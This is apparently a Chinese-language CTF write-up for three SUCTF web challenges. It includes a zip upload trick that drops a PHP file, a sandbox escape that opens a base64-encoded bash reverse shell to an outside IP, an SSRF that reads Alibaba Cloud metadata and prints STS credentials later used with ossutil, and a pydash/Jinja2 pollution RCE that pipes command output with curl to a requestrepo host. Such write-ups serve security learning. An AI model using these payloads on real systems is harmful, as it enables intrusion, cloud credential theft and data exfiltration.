SUCTF
photogallery
正常上传一次观察发包记录,有一个unzip.php文件,利用之前羊城杯时候的源码泄露漏洞获取源码
unzip.php
<?php
error_reporting(0);
function get_extension($filename){
return pathinfo($filename, PATHINFO_EXTENSION);
}
function check_extension($filename,$path){
$filePath = $path . DIRECTORY_SEPARATOR . $filename;
if (is_file($filePath)) {
$extension = strtolower(get_extension($filename));
if (!in_array($extension, ['jpg', 'jpeg', 'png', 'gif'])) {
if (!unlink($filePath)) {
// echo "Fail to delete file: $filename\n";
return false;
}
else{
// echo "This file format is not supported:$extension\n";
return false;
}
}
else{
return true;
}
}
else{
// echo "nofile";
return false;
}
}
function file_rename ($path,$file){
$randomName = md5(uniqid().rand(0, 99999)) . '.' . get_extension($file);
$oldPath = $path . DIRECTORY_SEPARATOR . $file;
$newPath = $path . DIRECTORY_SEPARATOR . $randomName;
if (!rename($oldPath, $newPath)) {
unlink($path . DIRECTORY_SEPARATOR . $file);
// echo "Fail to rename file: $file\n";
return false;
}
else{
return true;
}
}
function move_file($path,$basePath){
foreach (glob($path . DIRECTORY_SEPARATOR . '*') as $file) {
$destination = $basePath . DIRECTORY_SEPARATOR . basename($file);
if (!rename($file, $destination)){
// echo "Fail to rename file: $file\n";
return false;
}
}
return true;
}
function check_base($fileContent){
$keywords = ['eval', 'base64', 'shell_exec', 'system', 'passthru', 'assert', 'flag', 'exec', 'phar', 'xml', 'DOCTYPE', 'iconv', 'zip', 'file', 'chr', 'hex2bin', 'dir', 'function', 'pcntl_exec', 'array', 'include', 'require', 'call_user_func', 'getallheaders', 'get_defined_vars','info'];
$base64_keywords = [];
foreach ($keywords as $keyword) {
$base64_keywords[] = base64_encode($keyword);
}
foreach ($base64_keywords as $base64_keyword) {
if (strpos($fileContent, $base64_keyword)!== false) {
return true;
}
else{
return false;
}
}
}
function check_content($zip){
for ($i = 0; $i < $zip->numFiles; $i++) {
$fileInfo = $zip->statIndex($i);
$fileName = $fileInfo['name'];
if (preg_match('/\.\.(\/|\.|%2e%2e%2f)/i', $fileName)) {
return false;
}
// echo "Checking file: $fileName\n";
$fileContent = $zip->getFromName($fileName);
if (preg_match('/(eval|base64|shell_exec|system|passthru|assert|flag|exec|phar|xml|DOCTYPE|iconv|zip|file|chr|hex2bin|dir|function|pcntl_exec|array|include|require|call_user_func|getallheaders|get_defined_vars|info)/i', $fileContent) || check_base($fileContent)) {
// echo "Don't hack me!\n";
return false;
}
else {
continue;
}
}
return true;
}
function unzip($zipname, $basePath) {
$zip = new ZipArchive;
if (!file_exists($zipname)) {
// echo "Zip file does not exist";
return "zip_not_found";
}
if (!$zip->open($zipname)) {
// echo "Fail to open zip file";
return "zip_open_failed";
}
if (!check_content($zip)) {
return "malicious_content_detected";
}
$randomDir = 'tmp_'.md5(uniqid().rand(0, 99999));
$path = $basePath . DIRECTORY_SEPARATOR . $randomDir;
if (!mkdir($path, 0777, true)) {
// echo "Fail to create directory";
$zip->close();
return "mkdir_failed";
}
if (!$zip->extractTo($path)) {
// echo "Fail to extract zip file";
$zip->close();
}
for ($i = 0; $i < $zip->numFiles; $i++) {
$fileInfo = $zip->statIndex($i);
$fileName = $fileInfo['name'];
if (!check_extension($fileName, $path)) {
// echo "Unsupported file extension";
continue;
}
if (!file_rename($path, $fileName)) {
// echo "File rename failed";
continue;
}
}
if (!move_file($path, $basePath)) {
$zip->close();
// echo "Fail to move file";
return "move_failed";
}
rmdir($path);
$zip->close();
return true;
}
$uploadDir = __DIR__ . DIRECTORY_SEPARATOR . 'upload/suimages/';
if (!is_dir($uploadDir)) {
mkdir($uploadDir, 0777, true);
}
if (isset($_FILES['file']) && $_FILES['file']['error'] === UPLOAD_ERR_OK) {
$uploadedFile = $_FILES['file'];
$zipname = $uploadedFile['tmp_name'];
$path = $uploadDir;
$result = unzip($zipname, $path);
if ($result === true) {
header("Location: index.html?status=success");
exit();
} else {
header("Location: index.html?status=$result");
exit();
}
} else {
header("Location: index.html?status=file_error");
exit();
}
正常处理过后的文件名和路径无从得知,但是这里是先解压再移动,这里利用解压函数ZipArchive的超长文件名报错,让上传的文件在upload/suimages/留下写php的文件
import zipfile
import io
mf = io.BytesIO()
with zipfile.ZipFile(mf, mode="w", compression=zipfile.ZIP_STORED) as zf:
zf.writestr('1.php', b"<?php print_r(glob(\"/*\")););?>")
zf.writestr('A' * 5000, b'AAAAA')
with open("img.zip", "wb") as f:
f.write(mf.getvalue())
然后读取
import zipfile
import io
mf = io.BytesIO()
with zipfile.ZipFile(mf, mode="w", compression=zipfile.ZIP_STORED) as zf:
zf.writestr('1.php', b"<?php show_source(\"/seef1ag_getfl4g\");?>")
zf.writestr('A' * 5000, b'AAAAA')
with open("img.zip", "wb") as f:
f.write(mf.getvalue())
ezk8s on aliyun
读取一下源码
import os
def list_current_directory():
# 获取当前目录路径
current_directory = os.getcwd()
print(f"当前目录路径: {current_directory}")
# 获取当前目录下的文件和文件夹
items = os.listdir(current_directory)
if not items:
print("当前目录为空。")
else:
print("当前目录下的内容:")
for item in items:
# 检查是文件还是文件夹
item_type = "文件夹" if os.path.isdir(item) else "文件"
print(f"{item_type}: {item}")
if __name__ == "__main__":
list_current_directory()
import os
def read_main_py():
file_name = "main.py"
try:
with open(file_name, "r", encoding="utf-8") as file:
content = file.read()
print(content)
except Exception as e:
print(f"读取文件时发生错误: {e}")
if __name__ == "__main__":
read_main_py()
main.py
from flask import Flask, render_template, request, url_for, flash, redirect
app = Flask(__name__)
import sys
import subprocess
import os
"""
HINT: RCE me!
"""
INDEX_HTML = '''
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Python Executor</title>
</head>
<body>
<h1>Welcome to PyExector</h1>
<textarea id="code" style="width: 100%; height: 200px;" rows="10000" cols="10000" ></textarea>
<button onclick="run()">Run</button>
<h2>Output</h2>
<pre id="output"></pre>
<script>
function run() {
var code = document.getElementById("code").value;
fetch("/run", {
method: "POST",
headers: {
"Content-Type": "application/json"
},
body: JSON.stringify({
code: code
})
})
.then(response => response.text())
.then(data => {
document.getElementById("output").innerText = data;
});
}
</script>
</body>
</html>
'''
@app.route('/')
def hello():
return INDEX_HTML
@app.route("/run", methods=["POST"])
def runCode():
code = request.json["code"]
cmd = [sys.executable, "-i", f"{os.getcwd()}/audit.py"]
p = subprocess.Popen(cmd, stdin=subprocess.PIPE, stderr=subprocess.STDOUT, stdout=subprocess.PIPE)
return p.communicate(input=code.encode('utf-8'))[0]
if __name__ == "__main__":
app.run(host="0.0.0.0", port=5000)
audit.py
import sys
DEBUG = False
def audit_hook(event, args):
audit_functions = {
"os.system": {"ban": True},
"subprocess.Popen": {"ban": True},
"subprocess.run": {"ban": True},
"subprocess.call": {"ban": True},
"subprocess.check_call": {"ban": True},
"subprocess.check_output": {"ban": True},
"_posixsubprocess.fork_exec": {"ban": True},
"os.spawn": {"ban": True},
"os.spawnlp": {"ban": True},
"os.spawnv": {"ban": True},
"os.spawnve": {"ban": True},
"os.exec": {"ban": True},
"os.execve": {"ban": True},
"os.execvp": {"ban": True},
"os.execvpe": {"ban": True},
"os.fork": {"ban": True},
"shutil.run": {"ban": True},
"ctypes.dlsym": {"ban": True},
"ctypes.dlopen": {"ban": True}
}
if event in audit_functions:
if DEBUG:
print(f"[DEBUG] found event {event}")
policy = audit_functions[event]
if policy["ban"]:
strr = f"AUDIT BAN : Banning FUNC:[{event}] with ARGS: {args}"
print(strr)
raise PermissionError(f"[AUDIT BANNED]{event} is not allowed.")
else:
strr = f"[DEBUG] AUDIT ALLOW : Allowing FUNC:[{event}] with ARGS: {args}"
print(strr)
return
sys.addaudithook(audit_hook)
绕过沙箱 rce 弹个 shell
import os
import _posixsubprocess
_posixsubprocess.fork_exec([b"","-c","{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84LjE0Ny4xMDguMTgzLzIzMzMgMD4mMQ==}|{base64,-d}|{bash,-i}"], [b"/bin/bash"], True, (), None, None, -1, -1, -1, -1, -1, -1, *(os.pipe()), False, False,False, None, None, None, -1, None, False)
找了半天发现什么也没有,然后通过查找敏感信息,其实可以不用 RCE 弹 shell 也能做,打一个 SSRF 去找阿里云元数据
curl http://100.100.100.200/latest/meta-data/
import http.client
conn = http.client.HTTPConnection("100.100.100.200")
conn.request("GET", "/latest/meta-data/ram/security-credentials/oss-root")
response = conn.getresponse()
data = response.read()
print(f"{data.decode()}")
conn.close()
{
"AccessKeyId" : "STS.NTNAE1v8TCc66AL4NSoFejFwX",
"AccessKeySecret" : "FAKFjevuBEWcx3bUAyrpGJwSfLQ5DgYnXkD4EtW8U9Kw",
"Expiration" : "2025-01-13T10:25:04Z",
"SecurityToken" : "CAIS1AJ1q6Ft5B2yfSjIr5f7Cv+Fm+d19KHdNGf90E4GY8lJhYPcujz2IHhMdHRqBe0ctvQ+lG5W6/4YloltTtpfTEmBc5I179Fd6VqqZNTZqcy74qwHmYS1RXadFEZ1F29Dzr+rIunGc9KBNnrm9EYqs5aYGBymW1u6S+7r7bdsctUQWCShcDNCH604DwB+qcgcRxCzXLTXRXyMuGfLC1dysQdRkH527b/FoveR8R3Dllb3uIR3zsbTWsH6MZc1Z8wkDovsjbArKvL7vXQOu0QQxsBfl7dZ/DrLhNaZDmRK7g+OW+iuqYU3fFIjOvVgQ/4V/KaiyKUioIzUjJ+y0RFKIfHnm/ES9DUVqiGtOpRKVr5RHd6TUxxGwk6Svwo+nSmQwGPJReJb+udQu7JKc2gIYBv0ZNFJ1n7EnGlNRYbLXu/Ir1QXq3esyb6gQz4rK0cfeodGUvdUGoABVnqKHewtX/DUDGsUTFgW3oOZw0EOMmF5AY2DrdPpFTB2A4s23Eplv1DfiASTo51kK7JuUolOGIoaue/xToDD4m6zuOEwX0rBJsFJqkS0zUSk9yNj6HhB62WXumJjVfYRnCRhOHwgXfvPPl/jmXvOsh1zUf/7BQLJP4c/e3JFjQogAA==",
"LastUpdated" : "2025-01-13T04:25:04Z",
"Code" : "Success"
}
然后可以利用 STS 凭证去登陆,读取历史版本
ossutil.exe -e oss-cn-hangzhou.aliyuncs.com -t CAIS1AJ1q6Ft5B2yfSjIr5f7Cv+Fm+d19KHdNGf90E4GY8lJhYPcujz2IHhMdHRqBe0ctvQ+lG5W6/4YloltTtpfTEmBc5I179Fd6VqqZNTZqcy74qwHmYS1RXadFEZ1F29Dzr+rIunGc9KBNnrm9EYqs5aYGBymW1u6S+7r7bdsctUQWCShcDNCH604DwB+qcgcRxCzXLTXRXyMuGfLC1dysQdRkH527b/FoveR8R3Dllb3uIR3zsbTWsH6MZc1Z8wkDovsjbArKvL7vXQOu0QQxsBfl7dZ/DrLhNaZDmRK7g+OW+iuqYU3fFIjOvVgQ/4V/KaiyKUioIzUjJ+y0RFKIfHnm/ES9DUVqiGtOpRKVr5RHd6TUxxGwk6Svwo+nSmQwGPJReJb+udQu7JKc2gIYBv0ZNFJ1n7EnGlNRYbLXu/Ir1QXq3esyb6gQz4rK0cfeodGUvdUGoABVnqKHewtX/DUDGsUTFgW3oOZw0EOMmF5AY2DrdPpFTB2A4s23Eplv1DfiASTo51kK7JuUolOGIoaue/xToDD4m6zuOEwX0rBJsFJqkS0zUSk9yNj6HhB62WXumJjVfYRnCRhOHwgXfvPPl/jmXvOsh1zUf/7BQLJP4c/e3JFjQogAA== -k FAKFjevuBEWcx3bUAyrpGJwSfLQ5DgYnXkD4EtW8U9Kw -i STS.NTNAE1v8TCc66AL4NSoFejFwX api list-object-versions --bucket suctf-flag-bucket
ossutil.exe -e oss-cn-hangzhou.aliyuncs.com -t CAIS1AJ1q6Ft5B2yfSjIr5f7Cv+Fm+d19KHdNGf90E4GY8lJhYPcujz2IHhMdHRqBe0ctvQ+lG5W6/4YloltTtpfTEmBc5I179Fd6VqqZNTZqcy74qwHmYS1RXadFEZ1F29Dzr+rIunGc9KBNnrm9EYqs5aYGBymW1u6S+7r7bdsctUQWCShcDNCH604DwB+qcgcRxCzXLTXRXyMuGfLC1dysQdRkH527b/FoveR8R3Dllb3uIR3zsbTWsH6MZc1Z8wkDovsjbArKvL7vXQOu0QQxsBfl7dZ/DrLhNaZDmRK7g+OW+iuqYU3fFIjOvVgQ/4V/KaiyKUioIzUjJ+y0RFKIfHnm/ES9DUVqiGtOpRKVr5RHd6TUxxGwk6Svwo+nSmQwGPJReJb+udQu7JKc2gIYBv0ZNFJ1n7EnGlNRYbLXu/Ir1QXq3esyb6gQz4rK0cfeodGUvdUGoABVnqKHewtX/DUDGsUTFgW3oOZw0EOMmF5AY2DrdPpFTB2A4s23Eplv1DfiASTo51kK7JuUolOGIoaue/xToDD4m6zuOEwX0rBJsFJqkS0zUSk9yNj6HhB62WXumJjVfYRnCRhOHwgXfvPPl/jmXvOsh1zUf/7BQLJP4c/e3JFjQogAA== -k FAKFjevuBEWcx3bUAyrpGJwSfLQ5DgYnXkD4EtW8U9Kw -i STS.NTNAE1v8TCc66AL4NSoFejFwX cat oss://suctf-flag-bucket/oss-flag --version-id=CAEQmwIYgYDA6Lad1qIZIiAyMjBhNWVmMDRjYzY0MDI3YjhiODU3ZDQ2MDc1MjZhOA--
blog
注册个admin进去读源码
app.py
from flask import *
import time, os, json, hashlib
from pydash import set_
from waf import pwaf, cwaf
# 创建 Flask 应用
app = Flask(__name__)
app.config['SECRET_KEY'] = hashlib.md5(str(int(time.time())).encode()).hexdigest()
# 初始化用户数据和文章数据
users = {"testuser": "password"}
BASE_DIR = '/var/www/html/myblog/app'
articles = {
1: "articles/article1.txt",
2: "articles/article2.txt",
3: "articles/article3.txt"
}
# 友情链接数据
friend_links = [
{"name": "bkf1sh", "url": "https://ctf.org.cn/"},
{"name": "fushuling", "url": "https://fushuling.com/"},
{"name": "yulate", "url": "https://www.yulate.com/"},
{"name": "zimablue", "url": "https://www.zimablue.life/"},
{"name": "baozongwi", "url": "https://baozongwi.xyz/"},
]
# 用户类
class User:
def __init__(self):
pass
user_data = User()
# 路由:主页
@app.route('/')
def index():
if 'username' in session:
return render_template('blog.html', articles=articles, friend_links=friend_links)
return redirect(url_for('login'))
# 路由:登录
@app.route('/login', methods=['GET', 'POST'])
def login():
if request.method == 'POST':
username = request.form['username']
password = request.form['password']
if username in users and users[username] == password:
session['username'] = username
return redirect(url_for('index'))
else:
return "Invalid credentials", 403
return render_template('login.html')
# 路由:注册
@app.route('/register', methods=['GET', 'POST'])
def register():
if request.method == 'POST':
username = request.form['username']
password = request.form['password']
users[username] = password
return redirect(url_for('login'))
return render_template('register.html')
# 路由:修改密码
@app.route('/change_password', methods=['GET', 'POST'])
def change_password():
if 'username' not in session:
return redirect(url_for('login'))
if request.method == 'POST':
old_password = request.form['old_password']
new_password = request.form['new_password']
confirm_password = request.form['confirm_password']
if users[session['username']] != old_password:
flash("Old password is incorrect", "error")
elif new_password != confirm_password:
flash("New passwords do not match", "error")
else:
users[session['username']] = new_password
flash("Password changed successfully", "success")
return redirect(url_for('index'))
return render_template('change_password.html')
# 路由:友情链接
@app.route('/friendlinks')
def friendlinks():
if 'username' not in session or session['username'] != 'admin':
return redirect(url_for('login'))
return render_template('friendlinks.html', links=friend_links)
# 路由:添加友情链接
@app.route('/add_friendlink', methods=['POST'])
def add_friendlink():
if 'username' not in session or session['username'] != 'admin':
return redirect(url_for('login'))
name = request.form.get('name')
url = request.form.get('url')
if name and url:
friend_links.append({"name": name, "url": url})
return redirect(url_for('friendlinks'))
# 路由:删除友情链接
@app.route('/delete_friendlink/')
def delete_friendlink(index):
if 'username' not in session or session['username'] != 'admin':
return redirect(url_for('login'))
if 0 <= index < len(friend_links):
del friend_links[index]
return redirect(url_for('friendlinks'))
# 路由:文章详情
@app.route('/article')
def article():
if 'username' not in session:
return redirect(url_for('login'))
file_name = request.args.get('file', '')
if not file_name:
return render_template('article.html', file_name='', content="未提供文件名。")
# 黑名单检查和路径检查
blacklist = ["waf.py"]
if any(blacklisted_file in file_name for blacklisted_file in blacklist):
return render_template('article.html', file_name=file_name, content="大黑阔不许看")
if not file_name.startswith('articles/'):
return render_template('article.html', file_name=file_name, content="无效的文件路径。")
if file_name not in articles.values() and session.get('username') != 'admin':
return render_template('article.html', file_name=file_name, content="无权访问该文件。")
# 读取文件内容
file_path = os.path.join(BASE_DIR, file_name).replace('../', '')
try:
with open(file_path, 'r', encoding='utf-8') as f:
content = f.read()
except FileNotFoundError:
content = "文件未找到。"
except Exception as e:
app.logger.error(f"Error reading file {file_path}: {e}")
content = "读取文件时发生错误。"
return render_template('article.html', file_name=file_name, content=content)
# 路由:管理面板
@app.route('/Admin', methods=['GET', 'POST'])
def admin():
if request.args.get('pass') != "SUers":
return "nonono"
if request.method == 'POST':
try:
body = request.json
if not body:
flash("No JSON data received", "error")
return jsonify({"message": "No JSON data received"}), 400
key = body.get('key')
value = body.get('value')
if key is None or value is None:
flash("Missing required keys: 'key' or 'value'", "error")
return jsonify({"message": "Missing required keys: 'key' or 'value'"}), 400
if not pwaf(key) or not cwaf(value):
flash("Invalid key or value format", "error")
return jsonify({"message": "Invalid key or value format"}), 400
set_(user_data, key, value)
flash("User data updated successfully", "success")
return jsonify({"message": "User data updated successfully"}), 200
except json.JSONDecodeError:
flash("Invalid JSON data", "error")
return jsonify({"message": "Invalid JSON data"}), 400
except Exception as e:
flash(f"An error occurred: {str(e)}", "error")
return jsonify({"message": f"An error occurred: {str(e)}"}), 500
return render_template('admin.html', user_data=user_data)
# 路由:登出
@app.route('/logout')
def logout():
session.pop('username', None)
flash("You have been logged out.", "info")
return redirect(url_for('login'))
# 主程序
if __name__ == '__main__':
app.run(host='0.0.0.0', port=5000)
/Admin 路由下面有原型链污染,关于_set
方法示例
data = {"users": [{"name": "John"}, {"name": "Jane"}]}
set_(data, "users[1].name", "Alice")
print(data)
# 输出: {'users': [{'name': 'John'}, {'name': 'Alice'}]}
模板编译时的变量
在flask
中如使用render_template
渲染一个模板实际上经历了多个阶段的处理,其中一个阶段是对模板中的Jinja
语法进行解析转化为AST
,而在语法树的根部即Lib/site-packages/jinja2/compiler.py
中CodeGenerator
类的visit_Template
方法纯在一段有趣的逻辑
该逻辑会向输出流写入一段拼接的代码(输出流中代码最终会被编译进而执行),在生成代码的时候有一个可控变量 exported_names
,他是 runtime(https://github.com/pallets/jinja/blob/main/src/jinja2/runtime.py#L45) 里面的一个数组,所以我们完全可以通过 pydash.set_()
来进行覆盖,从而达到 rce。该变量为.runtime
模块(即Lib/site-packages/jinja2/runtime.py
)中导入的变量exported
和async_exported
组合后得到,这就意味着我们可以通过污染.runtime
模块中这两个变量实现RCE。由于这段逻辑是模板文件解析过程中必经的步骤之一,所以这就意味着只要渲染任意的文件均能通过污染这两属性实现RCE。
loader被过滤
spec
内置属性在Python 3.4
版本引入,其包含了关于类加载时的信息,本身是定义在Lib/importlib/_bootstrap.py
的类ModuleSpec
,显然因为定义在importlib
模块下的py
文件,所以可以直接采用<模块名>.__spec__.__init__.__globals__['sys']
获取到sys
模块
从0试到2发现2可以,最后的 payload
import requests
url = "http://27.25.151.48:10005/Admin?pass=SUers"
json = {
"key":"__init__.__globals__.globals.__spec__.__init__.__globals__.sys.modules.jinja2.runtime.exported.2",
"value":"*;__import__('os').system('l''s -al / | curl -d @- 1iqrzpth.requestrepo.com')"
}
res = requests.post(url,json=json)
print(res.text)
print(requests.get(url).text)
然后 /readflag,不理解为什么上面那个 import os 写法不行
import requests
url1 = "http://27.25.151.48:10005/Admin?pass=SUers"
json = {
"key":"__init__.__globals__.globals.__spec__.__init__.__globals__.sys.modules.jinja2.runtime.exported.2",
"value":"*;import os;os.system('/readf''l''ag | curl -d @- 1iqrzpth.requestrepo.com')"
}
剩一个POP回头有空再写
参考文章
https://twe1v3.top/2022/10/CTF%E4%B8%ADzip%E6%96%87%E4%BB%B6%E7%9A%84%E4%BD%BF%E7%94%A8/#%E5%88%A9%E7%94%A8%E5%A7%BF%E5%8A%BFonezip%E6%8A%A5%E9%94%99%E8%A7%A3%E5%8E%8B